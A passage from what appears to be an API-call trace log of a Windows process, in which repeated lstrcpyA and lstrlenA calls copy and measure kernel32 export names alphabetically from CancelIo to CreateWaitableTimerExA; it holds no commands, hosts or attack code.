(lpString="CALLBACKMAYRUNLONG") returned 18 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.826] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.826] lstrlenA (lpString="CANCELIO") returned 8 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.826] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.826] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.826] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.826] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.826] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.826] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.826] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.826] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.826] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.826] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.826] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.826] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.826] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.827] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.827] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.827] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.827] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.827] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.827] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.827] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.827] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.827] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.827] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.827] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.827] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.827] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.827] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.827] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.827] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.827] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.827] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.827] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.828] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.828] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.828] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.828] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.828] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.828] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.828] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.828] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.828] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.828] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.828] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.828] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.828] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.828] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.828] lstrlenA (lpString="COPYFILEA") returned 9 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.828] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.828] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.828] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.828] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.829] lstrlenA (lpString="COPYFILEW") returned 9 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.829] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.829] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.829] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.829] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.829] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.829] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.829] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.829] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.829] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.829] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.829] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.829] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.829] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.829] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.829] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.829] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.829] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.830] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.830] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.830] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.830] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.830] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.830] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.830] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.830] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.830] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.830] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.830] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.830] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.830] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.830] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.830] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.830] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.830] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.830] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.831] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.831] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.831] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.831] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.831] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.831] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.831] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.831] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.831] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.831] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.831] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.831] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.831] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.831] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.831] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.831] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.831] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.831] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.831] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.832] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.832] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.832] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.832] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.832] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.832] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.832] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.832] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.832] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.832] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.832] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.832] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.832] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.832] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.832] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.832] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.832] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.832] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.833] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.833] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.833] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, 